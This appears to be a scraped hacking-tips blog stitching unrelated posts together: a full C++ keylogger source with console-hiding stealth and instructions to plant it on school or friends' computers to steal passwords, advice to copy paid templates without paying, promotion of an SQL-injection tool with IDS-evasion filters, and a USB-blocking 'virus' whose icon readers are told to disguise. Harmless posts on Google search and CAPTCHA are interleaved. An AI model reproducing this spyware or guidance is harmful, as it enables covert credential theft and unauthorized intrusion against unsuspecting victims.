Website Copier

HTTrack can be used to download any paid Website Templates, How to use HTTrack with an example is explained below, so enjoy your favorite template without paying any penny.

Installing HTTrack

Below is an Example, How to use HTTrack

Keylogger using C++

Today i am going to introduce to the C++ Spyware code.   It is going to be very fun.  You can install this spyware in your college/school  or in your friend system, and get their username and passwords.  This is very simple hacking trick when compared to phishing web page.

Disadvantage of Phishing Web page:
you have to upload phishing web page to web hosting.  But only few website won’t detect the phishing webpage.
website url is different. Easy to detect that we are hacking.

Advantage of Spyware-keylogger:
Very simple and easy method.
Victim can’t detect that we are hacking.

How to create Keylogger using Visual C++?
Requirements:
Dev C++.  Download it from here: http://www.bloodshed.net/
Knowledge about Visual C++(need, if you are going to develop the code).

Install dev C++ in your system and open the dev C++ compiler.
Go to File->New->Source File.
you can see a blank works space will be there in window.
now copy the below keylogger code into the blank work space.

#include <iostream>
using namespace std;
#include <windows.h>
#include <winuser.h>
int Save (int key_stroke, char *file);
void Stealth();

int main()
{
Stealth();
char i;

while (1)
{
for(i = 8; i <= 190; i++)
{
if (GetAsyncKeyState(i) == -32767)
Save (i,”LOG.txt”);
}
}
system (“PAUSE”);
return 0;
}

/* *********************************** */

int Save (int key_stroke, char *file)
{
if ( (key_stroke == 1) || (key_stroke == 2) )
return 0;

FILE *OUTPUT_FILE;
OUTPUT_FILE = fopen(file, “a+”);

cout << key_stroke << endl;

if (key_stroke == 8)
fprintf(OUTPUT_FILE, “%s”, “[BACKSPACE]”);
else if (key_stroke == 13)
fprintf(OUTPUT_FILE, “%s”, “\n”);
else if (key_stroke == 32)
fprintf(OUTPUT_FILE, “%s”, ” “);
else if (key_stroke == VK_TAB)
fprintf(OUTPUT_FILE, “%s”, “[TAB]”);
else if (key_stroke == VK_SHIFT)
fprintf(OUTPUT_FILE, “%s”, “[SHIFT]”);
else if (key_stroke == VK_CONTROL)
fprintf(OUTPUT_FILE, “%s”, “[CONTROL]”);
else if (key_stroke == VK_ESCAPE)
fprintf(OUTPUT_FILE, “%s”, “[ESCAPE]”);
else if (key_stroke == VK_END)
fprintf(OUTPUT_FILE, “%s”, “[END]”);
else if (key_stroke == VK_HOME)
fprintf(OUTPUT_FILE, “%s”, “[HOME]”);
else if (key_stroke == VK_LEFT)
fprintf(OUTPUT_FILE, “%s”, “[LEFT]”);
else if (key_stroke == VK_UP)
fprintf(OUTPUT_FILE, “%s”, “[UP]”);
else if (key_stroke == VK_RIGHT)
fprintf(OUTPUT_FILE, “%s”, “[RIGHT]”);
else if (key_stroke == VK_DOWN)
fprintf(OUTPUT_FILE, “%s”, “[DOWN]”);
else if (key_stroke == 190 || key_stroke == 110)
fprintf(OUTPUT_FILE, “%s”, “.”);
else
fprintf(OUTPUT_FILE, “%s”, &key_stroke);

fclose (OUTPUT_FILE);
return 0;
}

/* *********************************** */

void Stealth()
{
HWND Stealth;
AllocConsole();
Stealth = FindWindowA(“ConsoleWindowClass”, NULL);
ShowWindow(Stealth,0);
}

Compile the Code(Ctrl+F9)

Now execute the program by selecting Execute->Run(ctrl+F10)

now your keylogger will run in your system. whatever you type using keyboard. It will be stored in Log.txt file.
you can see the log.txt file where you save the file.

bind the exe file with image or any files and send it to your friend.
(0r)
if you have physical access to your college/school system,then copy the exe file in that system and run it.

The Mole – Automatic SQL Injection SQLi Exploitation Tool

The Mole is an automatic SQL Injection exploitation tool. Only by providing a vulnerable URL and a valid string on the site it can detect the injection and exploit it, either by using the union technique or a boolean query based technique.

Features

• Support for injections using Mysql, SQL Server, Postgres and Oracle databases.
• Command line interface. Different commands trigger different actions.
• Auto-completion for commands, command arguments and database, table and columns names.
• Support for query filters, in order to bypass certain IPS/IDS rules using generic filters, and the possibility of creating new ones easily.
• Developed in python 3If you want to know how to use The Mole there’s a good tutorial here.You can download The Mole here:

  Windows: themole-0.2.6-win32.zip
  Linux: themole-0.2.6-lin-src.tar.gz

  Or read more here.

How to Create Relationship in Ms Access 2007

Click On the image to view it in large size(original size)

 

How Google Search Works ?

Google search engine is undoubtedly most widely used search engine. It was founded by Larry Pageand Sergey Brin. We must have the knowledge of basic working and methodology used by google search engine.  I have explained the things in very simple words.  Read Carefully

Overview :

Okay lets assume , you wanna design a little search engine that would search the requested key words in  few websites (say 5 websites) ,So what would be our approach ? First of all, we will store the contents that is webpages of that 5 websites in our database. Then we will make an index including the important part of these web pages like titles,headings,meta tags etc. Then we would make a simple search box meant for users where they could enter the search query or keyword. User’s entered query will be processed  to match with the keywords in the index and  the results would be returned accordingly. We will return user with list of the links of actual websites and the preference to those websites will be given to them using some algorithm.   I hope the basic overview of  working of search engine is clear to you.

Now read more regarding the same.

A web search engine works basically in the following manner. There are basically three parts.

1. Web Crawling 

2. Indexing 

3. Query processing or searching

1. First step of working of search engine is web crawling. A web crawler or a web spider is a software that travels across the world wide web and downloads,saves webpages. A web crawaler is fed with URLs of websites and it starts proceeding. It starts downloading and saving web pages associated with that websites. Wanna have feel of web crawaler. Download one from here. Feed it with links of websites and it    will start downloading  webpages,images etc associated with those websites. Name of google web crawler is GoogleBot.  Wanna see the copies of webpages saved in google database ? (actually not exactly)

Lets take example of any website , say http://www.wikipedia.org

Do this -:

Go to google. and  search for ‘wikipedia’ Hopefully you would get this link on top.

Click on the ‘cached’ link as shown.

OR

Directly search for ‘cache:wikipedia.org’

Then read the lines at top the page you got and things would be clear to you.

2. After googlebot has saved all pages, it submits them to google indexer. Indexing means extracting out words from titles,headings,metatags etc.The indexed pages are stored in google index database. The contents of index database is similar to the index at the back of your book. Google ignores the common or insignificant words like as,for,the,is,or,on (called as stop words) which are usually in every webpage. Index is done basically to improve the speed of searching.

3. The third part is query processing or searching. It includes the search box where we enter the search query/keyword for which we are looking for. When user enters the serach query, google matches the entered key words in the pages saved in indexed database and returns the actual links of webpages from where those pages are reterived. The priority is obviously given to best matching results. Google uses a patented algorithm called PageRank that helps rank web pages that match a given search string.

The above three steps are followed not only google search but most of the web search engines.Ofcourse there are many variations but methodology is same.

What is Robots.txt ?
Web Administrators do not the web crawlers or Web spiders to fetch every page/file of the website and show the links in search results.Robots.txt is a simple text file meant to be placed in top-level directory of the website which contain the links that web administrators do not want to be fetched by web crawlers. The first step of a Web Crawler is to check the content of Robots.txt

Example of contents of Robots.txt
User-agent: * //for web crawlers of all search engines

Disallow:/directory_name/file_name //specify a file of particular dir.
Disallow:/directory_name/  //all files of particular dir.

You can see robots.txt of  websites (if exists). Example http://www.microsoft.com/robots.txt

Google Search Regex(Google Hacking)

Well, they are not really the same regex as we can use on Linux or programming. But some of the “tags” are pretty good and can help you on a lot of searches.

Basic
– “+” – Result must contain word
– “-” – Result must not contain word
– “OR” and “|” – Applied between two words, it will find “this or that”, or both. The “OR” operator must be uppercase and have a space between the 2 words on each side. The “|” operator does not need a space between the words
– ” “” ” – Finds an exact match of the word or phrase
– “~” – Looks for synonyms or similar items. Eg: “~run” will match runner’s and marathon
– “..” – Indicates that there’s a range between number. Eg: 100..200 or $100..$200
– “*” – Matches a word or more. Eg: “Advanced * Form” finds “Advanced Search Form”
– “word-word” – All forms (spelled, singe word, phrase and hyphenated

Important
– “site:” – Search only one website or domain. Eg: “PC site:wazem.org” will find PC within wazem.org
– “filetype:” or “ext:” – Search for docs in the file type. Eg: “Linux tutorial filetype:pdf” will find Linux tutorial in the pdf format
– “link:” – Find linked pages (pages that point to the URL)
– “define:” – Provides definition for a word or a phrase
– “cache:” – Display Google’s cached version of a web page.
– “info:” – Info about a page
– “related:” – Websites related to the URL
– “allinurl:” – All words must be in the URL
– “allintitle:” – All words must be in the title of the page
– “intittle:” – Match words in the title of the page
– “source:” – News articles from a specific source

Calculations
– “+ – * /” – Normal math signs. Eg: 12 * 4 + 2 – 1 /2
– “% of” – Percentage. Eg:10% of 100
– “^” or “**” – Raise to a power
– units “in” units – Convert Units (currency, measurements, weight). Eg: 300 lbs in Kg, 40 in hex

Others
– “book” or “books” – Search books. Eg: book “LPI Linux Certification in a Nutshell”

How to Share your Tweets in your Facebook wall

Now a days Twitter and Facebook are the viral social media. We used to share things with our friends and followers, most people update same thing in both Twitter and Facebook. Today i am going to guide you to how to Share your tweets in your facebook wall. Few months before there is an application to integrate tweets in Facebook wall but now Twitter included the Feature in Twitter Web UI itself. Its simple and Easy to Setup your Tweets to share on your Facebook wall.

Step 1:

First Login to the Facebook and Twitter. Then go to Twitter ‘Settings‘.

Step 2:

Click the ‘Profile’ Tab in the settings and you can find the Facebook feature at last.

Step 3:

Click ‘POST YOUR TWEETS TO FACEBOOK‘ button and it will ask your permission to connect the Facebook twitter app with your profile. Just Click “ALLOW”

Step 4:

Now its all done, Your Twitter is configured to share the tweets in Facebook.Now Click ‘SAVE‘ and Post a Tweet and go to Facebook and check it will show your Tweet on your Facebook wall. (example screen shot below)Hope you learned how to Share your tweets on your Facebook wall. Why waiting, just connect your Twitter with Facebook and share your Tweets in your Facebook Wall.

A Virus Program to Disable USB Ports

In this post I will show how to create a simple virus that disables/blocks the USB ports on the computer (PC). As usual I use my favorite C programming language to create this virus. Anyone with a basic knowledge of C language should be able to understand the working of this virus program.

Once this virus is executed it will immediately disable all the USB ports on the computer. As a result the you’ll will not be able to use your pen drive or any other USB peripheral on the computer. The source code for this virus is available for download. You can test this virus on your own computer without any worries since I have also given a program to re-enable all the USB ports.

1. Download the USB_Block.rar file on to your computer.

2. It contains the following 2 files.

• block_usb.c (source code)
• unblock_usb.c (source code)

3. You need to compile them before you can run it.

3. Upon compilation of block_usb.c you get block_usb.exe which is a simple virus that will block (disable) all the USB ports on the computer upon execution (double click).

4. To test this virus, just run the block_usb.exe file and insert a USB pen drive (thumb drive). Now you can see that your pen drive will never get detected. To re-enable the USB ports just run the unblock_usb.exe  (you need to compile unblock_usb.c) file. Now insert the pen drive and it should get detected.

5. You can also change the icon of this file to make it look like a legitimate program.

What is CAPTCHA and How it Works?

CAPTCHA or Captcha (pronounced as cap-ch-uh) which stands for “Completely Automated Public Turing test to tell Computers and Humans Apart” is a type of challenge-response test to ensure that the response is only generated by humans and not by a computer. In simple words, CAPTCHA is the word verification test that you will come across the end of a sign-up form while signing up for Gmail or Yahoo account. The following image shows the typical samples of CAPTCHA.Almost every Internet user will have an experience of CAPTCHA in their daily Internet usage, but only a few are aware of what it is and why they are used. So in this post you will find a detailed information on how CAPTCHA works and why they are used.

What Purpose does CAPTCHA Exactly Serve?

CAPTCPA is mainly used to prevent automated software (bots) from performing actions on behalf of actual humans. For example while signing up for a new email account, you will come across a CAPTCHA at the end of the sign-up form so as to ensure that the form is filled out only by a legitimate human and not by any of the automated software or a computer bot. The main goal of CAPTCHA is to put forth a test which is simple and straight forward for any human to answer but for a computer, it is almost impossible to solve.

What is the Need to Create a Test that Can Tell Computers and Humans Apart?

For many the CAPTCHA may seem to be silly and annoying, but in fact it has the ability to protect systems from malicious attacks where people try to game the system. Attackers can make use of automated softwares to generate a huge quantity of requests thereby causing a high load on the target server which would degrade the quality of service of a given system, whether due to abuse or resource expenditure. This can affect millions of legitimate users and their requests. CAPTCHAs can be deployed to protect systems that are vulnerable to email spam, such as the services from Gmail, Yahoo and Hotmail.

Who Uses CAPTCHA?

CAPTCHAs are mainly used by websites that offer services like online polls and registration forms. For example, Web-based email services like Gmail, Yahoo and Hotmail offer free email accounts for their users. However upon each sign-up process, CAPTCHAs are used to prevent spammers from using a bot to generate hundreds of spam mail accounts.

Designing a CAPTCHA System

CAPTCHAs are designed on the fact that computers lack the ability that human beings have when it comes to processing visual data. It is more easily possible for humans to look at an image and pick out the patterns than a computer. This is because computers lack the real intelligence that humans have by default. CAPTCHAs are implemented by presenting users with an image which contains distorted or randomly stretched characters which only humans should be able to identify. Sometimes characters are striked out or presented with a noisy background to make it even more harder for computers to figure out the patterns.

Most, but not all, CAPTCHAs rely on a visual test. Some Websites implement a totally different CAPTCHA system to tell humans and computers apart. For example, a user is presented with 4 images in which 3 contains picture of animals and one contain a flower. The user is asked to select only those images which contain animals in them. This Turing test can easily be solved by any human, but almost impossible for a computer.

Breaking the CAPTCHA

The challenge in breaking the CAPTCHA lies in real hard task of teaching a computer how to process information in a way similar to how humans think. Algorithms with artificial intelligence (AI) will have to be designed in order to make the computer think like humans when it comes to recognizing the patterns in images. However there is no universal algorithm that could pass through and break any CAPTCHA system and hence each CAPTCHA algorithm must have to be tackled individually. It might not work 100 percent of the time, but it can work often enough to be worthwhile to spammers.

Hack Web Applications by Intercepting HTTP request/response using WebScarab

Hello Friends,

Today we will understand how we can intercept the HTTP request we send to a website and how we can analyse the response header.For this purpose we will use WebScarab which you can download by searching it on google.

After you have installed the setup you will first have to set your browser so that WebScarab can intercept the request and response.

I am taking the example of Firefox here. Go to options > Advanced > Network > Settings > Then select the Manual Proxy configuration and enter the following values.

HTTP proxy – 127.0.0.1 and port – 8008

This sets the webscarab to intercept the request by acting as a localhost proxy .

Now you start your webScarab by clicking on the icon.

The screen will appear wired and somthing like as shown in the figure. Click on the figure to enlarge it .

In the intercept tab , select “Intercept request” and in the left hand side menu select “Get” and “Post” options .

This makes your webScarab completely ready to intercept the HTTP Get and post requests .Now in your browser type any url , for e.g , google.com and you will get a window that will show the intercepted HTTP Get request. Now if you click on the “Intercept Response” button then it will also intercept the response that is coming back to the browser from the google server.

You can use this technique to analyse the the various request and response headers and let me tell you this can be very very deadly . If you are able to make the right moves and changes in the Headers then you can easily modify the headers to send invalid valuse to the servers .

In the main window of the webScarab , the “Summary” tab shows you the details of all the intercepted requests and response.This is a short tutorial on webScarab that will give you a basic understanding of how to use webscarab to intercept the HTTP values and analyse them > Rest is upto you how far you can take it .